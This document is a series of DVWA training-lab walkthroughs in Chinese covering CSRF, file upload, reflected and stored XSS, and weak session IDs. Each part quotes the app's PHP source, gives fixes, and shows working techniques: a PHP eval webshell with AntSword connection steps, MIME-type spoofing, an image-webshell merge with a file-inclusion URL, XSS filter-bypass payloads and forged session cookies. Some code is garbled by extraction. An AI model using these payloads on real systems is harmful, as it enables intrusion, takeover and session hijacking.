if( isset( $_GET[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Do the passwords match?
	if( $pass_new == $pass_conf ) {
		// They do!
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update the database
		$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
		$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );

		// Feedback for the user
		$html .= "Password Changed.";
	}
	else {
		// Issue with passwords matching
		$html .= "Passwords did not match.";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

1、正常修改密码并成功，使用BurpSuitePro捕获流量包，发现仍使用get提交方式，但多了验证参数token

2、直接将链接复制粘贴修改密码肯定失败，提示token不正确

有两种方法可以获得token值

方法一：利用DVWA中储存型XSS漏洞获得网页token

1、修改储存型XSS的网页脚本"D:\phpstudy_pro\DVWA-master\vulnerabilities\xss_s\index.php"，加入下面两行代码（修改文件之前做好备份）

1
2


Name:test
Message:this is a test comment.
Name:
Message:1

2、保存文件，打开DVWA High级别下的储存型XSS页面，得到token值

3、将得到的token替换，BurpSuitePro捕获流量包中原有的token

4、发送构造好的数据包，得到响应，密码修改成功

方法二：在BurpSuite安装插件，获取token

1、安装CSRF Token Tracker插件

2、添加一条CSRF Token Tracker规则并勾选，再勾选"根据规则同步requests"

3、截获修改密码请求包

4、将抓到的包Send to Repeater，在Repeater页面修改"password_new"和"password_conf"参数，Send后发现token值发生变化，修改密码成功

DVWA Impossible 级别 CSRF

0、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48


php

if( isset( $_GET[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$pass_curr = $_GET[ 'password_current' ];
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Sanitise current password input
	$pass_curr = stripslashes( $pass_curr );
	$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass_curr = md5( $pass_curr );

	// Check that the current password is correct
	$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
	$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
	$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
	$data->execute();

	// Do both new passwords match and does the current password match the user?
	if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
		// It does!
		$pass_new = stripslashes( $pass_new );
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update database with new password
		$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
		$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
		$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
		$data->execute();

		// Feedback for the user
		$html .= "Password Changed.";
	}
	else {
		// Issue with passwords matching
		$html .= "Passwords did not match or current password incorrect.";
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

网络安全 DVWA通关指南 DVWA File Upload（文件上传）

Wed, 25 Sep 2024 12:22:56 +0000

DVWA File Upload（文件上传）

参考文献

WEB 安全靶场通关指南

修复建议

1、使用白名单限制可以上传的文件扩展名

2、注意0x00截断攻击（PHP更新到最新版本）

3、对上传后的文件统一随机命名，不允许用户控制扩展名

4、上传文件的存储目录禁用执行权限

Low

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45


php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// Can we move the file to the upload folder?
	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
		// No
		$html .= 'Your image was not uploaded.';
	}
	else {
		// Yes!
		$html .= "{$target_path} succesfully uploaded!";
	}
}

?>
    
    
// 检查是否接收到表单提交的“Upload”按钮
if( isset( $_POST[ 'Upload' ] ) ) {
    // 定义目标文件夹路径，这里假设DVWA_WEB_PAGE_TO_ROOT是一个预定义常量，指向网站根目录
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

    // 获取上传文件的原始名称，并将其附加到目标路径上，以构建完整的文件存储路径
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // 使用PHP内置函数move_uploaded_file尝试将临时文件移动到目标路径
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // 如果文件未成功移动（例如，由于权限问题或文件大小超出限制等），输出错误信息
        $html .= 'Your image was not uploaded.';
    }
    else {
        // 文件成功上传至指定位置，输出成功信息
        $html .= "{$target_path} successfully uploaded!";
    }
}

// 注解：
// 上述代码实现了一个简单的文件上传功能，但缺少必要的安全验证，如文件类型检查、文件大小限制以及防止文件名注入攻击等。
// 在实际生产环境中，应在将文件移动到目标路径之前，添加详细的验证和清理步骤以确保上传行为的安全性。
?>

2、Low级别没有对上传的文件进行任何限制，我们可以直接上传一句话木马，然后使用中国蚁剑连接。

1

php @eval($_POST['attack']) ?>

使用蚁剑连接一句话木马

启动AntSword应用后，在界面的任意空白区域点击鼠标右键，这时会出现一个菜单。在弹出的菜单中，选择「添加数据」选项。
进入到添加数据的页面，根据屏幕提示填写所需的信息。确保每一项必填内容都已正确无误地填写完毕，点击「测试连接」按钮，检查连接是否成功。
填写完成后，点击页面中的「添加」按钮，这时候你刚刚输入的信息会被保存为一个新的Shell条目，并能在数据管理列表中看到它。
接下来，双击这个新添加的Shell条目，系统将带你进入该Shell对应的文件管理界面，从而可以进一步操作和管理相关文件。

连接木马成功后，直接获取Webshell，可以在服务器上进行任意操作。

Medium

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75


php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

	// Is it an image?
	if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
		( $uploaded_size < 100000 ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
			// No
			$html .= 'Your image was not uploaded.';
		}
		else {
			// Yes!
			$html .= "{$target_path} succesfully uploaded!";
		}
	}
	else {
		// Invalid file
		$html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.';
	}
}

?>
    
    
    
    
    

// 检查是否设置了 'Upload' POST 参数，这通常意味着文件上传表单已被提交
if( isset( $_POST[ 'Upload' ] ) ) {

    // 设置目标上传路径，结合DVWA_WEB_PAGE_TO_ROOT常量定位到uploads目录下
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

    // 使用原始文件名构建完整的文件保存路径
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // 获取上传文件的信息
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];      // 文件名
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];      // 文件类型（MIME类型）
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];      // 文件大小

    // 检查文件是否为允许的图像格式（JPEG或PNG）且文件大小小于100KB
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) {

        // 尝试将上传的临时文件移动到指定的目标路径
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // 如果文件无法移动（可能是权限问题或路径错误），输出错误信息
            $html .= 'Your image was not uploaded.';
        }
        else {
            // 文件成功上传，输出成功信息及上传后的文件路径
            $html .= "{$target_path} successfully uploaded!";
        }
    }
    else {
        // 如果文件不是允许的类型或超过大小限制，输出错误信息
        $html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.';
    }
}

?>

Medium级别限制上传文件类型只能为JPEG或PNG，同时限制文件大小不能超过100KB。这个时候再上传一句话木马，会提示上传失败。

2、使用Burp Suite抓取一句话木马文件上传的包，发现上传的PHP文件类型在包里。

修改1.php文件的文件类型为“image/png”，然后Foward。

1

Content-Type: image/png;

虽然我们上传的文件是PHP文件，但还是可以通过修改网页HTTP报文中文件类型，来绕过网页白名单检查。

High

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78


php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

	// Is it an image?
	if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
		( $uploaded_size < 100000 ) &&
		getimagesize( $uploaded_tmp ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
			// No
			$html .= 'Your image was not uploaded.';
		}
		else {
			// Yes!
			$html .= "{$target_path} succesfully uploaded!";
		}
	}
	else {
		// Invalid file
		$html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.';
	}
}

?>
    
    
    
    

// 检查是否设置了 'Upload' POST 参数，表明文件上传表单已被提交
if( isset( $_POST[ 'Upload' ] ) ) {

    // 设置文件上传的目标目录，结合DVWA_WEB_PAGE_TO_ROOT常量定位到uploads文件夹
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

    // 从上传文件名中提取文件的基本名称，包括其扩展名，用于构建完整的目标文件路径
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // 获取上传文件的详细信息
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];       // 原始文件名
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); // 文件扩展名，通过查找最后一个点的位置来提取
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];       // 文件大小（字节）
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];    // 上传文件的临时存储路径

    // 检查文件扩展名是否为允许的图像格式（不区分大小写），文件大小是否小于100KB，并确认是有效的图像文件
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) { // 使用getimagesize()确保文件是可识别的图像

        // 尝试将上传的临时文件移动到指定的目标路径
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // 如果文件未能成功移动（可能因权限问题或路径错误），输出错误信息
            $html .= 'Your image was not uploaded.';
        }
        else {
            // 文件成功上传，输出包含文件路径的成功信息
            $html .= "{$target_path} successfully uploaded!";
        }
    }
    else {
        // 如果文件扩展名不符、过大或不是有效的图像文件，输出错误信息
        $html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.';
    }
}

?>

getimagesize()函数，用于获取图像文件的大小以及相关信息。该函数会检查图片文件头，如果不存在或不是一个有效的图像文件则报错。

1、我们可以准备一张图片和一句话木马的文件，通过 copy 命令将两个文件合并成一个文件。

1

copy muma.png/b + muma.php/a 1.png

文件上传成功

2、但此时2.jpg是个图像文件，无法使用蚁剑连接。我们需要将2.jpg作为php文件执行，使用文件包含漏洞( File Inclusion)，构造payload。

1

http://dvwa/vulnerabilities/fi/?page=file:///D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\1.png

Impossible

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62


php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
	$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

	// Where are we going to be writing to?
	$target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
	//$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
	$target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
	$temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
	$temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

	// Is it an image?
	if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
		( $uploaded_size < 100000 ) &&
		( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
		getimagesize( $uploaded_tmp ) ) {

		// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
		if( $uploaded_type == 'image/jpeg' ) {
			$img = imagecreatefromjpeg( $uploaded_tmp );
			imagejpeg( $img, $temp_file, 100);
		}
		else {
			$img = imagecreatefrompng( $uploaded_tmp );
			imagepng( $img, $temp_file, 9);
		}
		imagedestroy( $img );

		// Can we move the file to the web root from the temp folder?
		if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
			// Yes!
			$html .= "${target_file} succesfully uploaded!";
		}
		else {
			// No
			$html .= 'Your image was not uploaded.';
		}

		// Delete any temp files
		if( file_exists( $temp_file ) )
			unlink( $temp_file );
	}
	else {
		// Invalid file
		$html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.';
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

网络安全 DVWA通关指南 DVWA Reflected Cross Site Scripting (反射型 XSS)

Tue, 24 Sep 2024 12:22:37 +0000

DVWAReflected Cross Site Scripting (反射型 XSS)

参考文献

WEB 安全靶场通关指南

XSS跨站原理

当应用程序发送给浏览器的页面中包含用户提交的数据，但没有经过适当验证或转义时，就会导致跨站脚本漏洞。这个“跨”实际上属于浏览器的特性，而不是缺陷;

浏览器同源策略：只有发布Cookie的网站才能读取Cookie。

会造成Cookie窃取、劫持用户Web行为、结合CSRF进行针对性攻击等危害

反射型

出现在搜索栏，用户登录等地方，常用来窃取客户端的Cookie进行钓鱼欺骗。(需要用户去点击)

想要窃取cookie要满足两个条件：

1.用户点击攻击者构造的URL

2.访问被攻击的应用服务(即存在xss的网站)

Low

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


php

header ("X-XSS-Protection: 0");
//这行代码实际上禁用了浏览器内置的XSS防护机制。现代浏览器通常会有一个XSS过滤器，默认开启，用于检测并阻止某些类型的反射型XSS攻击。将此值设为0意味着告诉浏览器不要进行任何自动的XSS防护。

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Feedback for end user
	$html .= 'Hello ' . $_GET[ 'name' ] . '';
}

?>
//对用户输入的数据没有进行任何过滤或转义处理

2、输入，弹出一个警告框显示“XSS”，这证明了XSS攻击的成功。

1
2
3
4


1、

 是HTML中的标签，用于定义JavaScript代码块的开始和结束。
alert() 是JavaScript的一个内置函数，用于显示带有一条消息的对话框。用户必须点击确定按钮才能关闭这个对话框并继续操作页面。

3、 解决方案 :

对用户输入的数据进行适当的过滤或转义，可以使用PHP的 htmlspecialchars() 函数来转义特殊字符，确保它们被安全地显示为数据而不是被执行为代码：
1 2

1$safeName = htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8'); 2$html .= 'Hello ' . $safeName . ' ';
同时，考虑是否真的需要禁用XSS防护头，除非有充分的理由，否则应保持浏览器的默认防护机制启用。

Medium

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = str_replace( '
//双写绕过

//区分大小写

//绕过

进入Home标签页，再回到XSS（Stored）页面，仍然可以成功，证明存储型XSS攻击成功

（如果需要删除数据库中存在的XSS代码，进入dvwa数据库中guestbook表，选择性删除数据。）

1
2
3
4


mysql -uroot -proot
use dvwa;
select * from guestbook;
delete from guestbook where comment_id=2;

解决方案：

XSS防护 ：在将用户输入的数据输出到网页前，应该使用 htmlspecialchars 函数（或类似的适当函数，依据上下文可能还包括其他措施）对数据进行转义，确保任何潜在的HTML标签和JavaScript代码被呈现为纯文本而非执行。

修正示例：

1
2
3
4
5
6


1// 假设从数据库获取数据后准备展示给用户
2$safeMessage = htmlspecialchars($retrievedMessage, ENT_QUOTES, 'UTF-8');
3$safeName = htmlspecialchars($retrievedName, ENT_QUOTES, 'UTF-8');
4
5echo "Comment: $safeMessage
";
6echo "Name: $safeName";

Medium

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
    //htmlspecialchars()函数将特殊字符（如<, >, &, ", '）转换为对应的HTML实体（如<, >, &, ", '），确保即使用户输入包含HTML或JavaScript代码，这些代码也会被浏览器解析为纯文本显示，而不是被执行。

    // Sanitize name input
    $name = str_replace( '
//区分大小写
ipt>alert(/XSS/)
//双写绕过

High

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


php

if( isset( $_POST[ 'btnSign' ] ) ) {
	// Get input
	$message = trim( $_POST[ 'mtxMessage' ] );
	$name    = trim( $_POST[ 'txtName' ] );

	// Sanitize message input
	$message = strip_tags( addslashes( $message ) );
	$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$message = htmlspecialchars( $message );

	// Sanitize name input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
	$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

	// Update database
	$query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );

	//mysql_close();
}

?>
//依然是name参数存在XSS漏洞

2、使用其他标签绕过preg_replace函数检查

1
2


<img src=x onerror=alert(/XSS/)>
<svg onload=alert(/XSS/)>

Impossible

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


php

if( isset( $_POST[ 'btnSign' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$message = trim( $_POST[ 'mtxMessage' ] );
	$name    = trim( $_POST[ 'txtName' ] );

	// Sanitize message input
	$message = stripslashes( $message );
	$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$message = htmlspecialchars( $message );

	// Sanitize name input
	$name = stripslashes( $name );
	$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$name = htmlspecialchars( $name );

	// Update database
	$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
	$data->bindParam( ':message', $message, PDO::PARAM_STR );
	$data->bindParam( ':name', $name, PDO::PARAM_STR );
	$data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

网络安全 DVWA通关指南 DVWA Weak Session IDs（弱会话）

Sat, 21 Sep 2024 12:25:16 +0000

DVWA WeakSessionIDs（弱会话）

参考文献

WEB 安全靶场通关指南

Low Level

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


php

$html = "";

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    if (!isset ($_SESSION['last_session_id'])) {
       $_SESSION['last_session_id'] = 0;
    }
    $_SESSION['last_session_id']++;
    $cookie_value = $_SESSION['last_session_id'];
    setcookie("dvwaSession", $cookie_value);
}
?>

Low级别的cookie生成方式：如果 $cookie_value不存在就设为0，存在则$ cookie_value加1，最后以dvwaSession=$cookie_value呈现。

2、使用BurpSuite抓包，如下：

每重放一次，dvwaSession值加1。

构造Payload：

1

dvwaSession=4; PHPSESSID=i2p425277d67521jah1hpkh3hr; security=low

使用火狐浏览器的hackbarV2，粘贴URL和cookie，提交(Execute)，实现免密码登录。

Medium Level

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


php

$html = "";

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    $cookie_value = time();
    //time() 函数返回自 Unix 纪元（January 1 1970 00:00:00 GMT）起的当前时间的秒数。
    setcookie("dvwaSession", $cookie_value);
}
?>

Medium Level的cookie值由时间戳生成。抓包如下：

2、获取对应时间的时间戳，拼接到cookie中提交，即可登录成功

High Level

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


php

$html = "";

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    if (!isset ($_SESSION['last_session_id_high'])) {
       $_SESSION['last_session_id_high'] = 0;
    }
    $_SESSION['last_session_id_high']++;
    $cookie_value = md5($_SESSION['last_session_id_high']);
    setcookie("dvwaSession", $cookie_value, time()+3600, "/vulnerabilities/weak_id/", $_SERVER['HTTP_HOST'], false, false);
}

?>

cookie值的初始生成与Low level一致，对cookie值进行MD5加密后作为cookie值。抓包如下：

2、将从0增加的整数进行MD5加密，MD5值作为cookie值，构造Payload提交：

1

dvwaSession=cfcd208495d565ef66e7dff9f98764da; dvwaSession=1715928053; PHPSESSID=26ks0v1tpvqsu15da00mn3i2cq; security=high

我的是新的页面，所以cookie值为0

Impossible Level

1
2
3
4
5
6
7
8
9


php

$html = "";

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    $cookie_value = sha1(mt_rand() . time() . "Impossible");
    setcookie("dvwaSession", $cookie_value, time()+3600, "/vulnerabilities/weak_id/", $_SERVER['HTTP_HOST'], true, true);
}
?>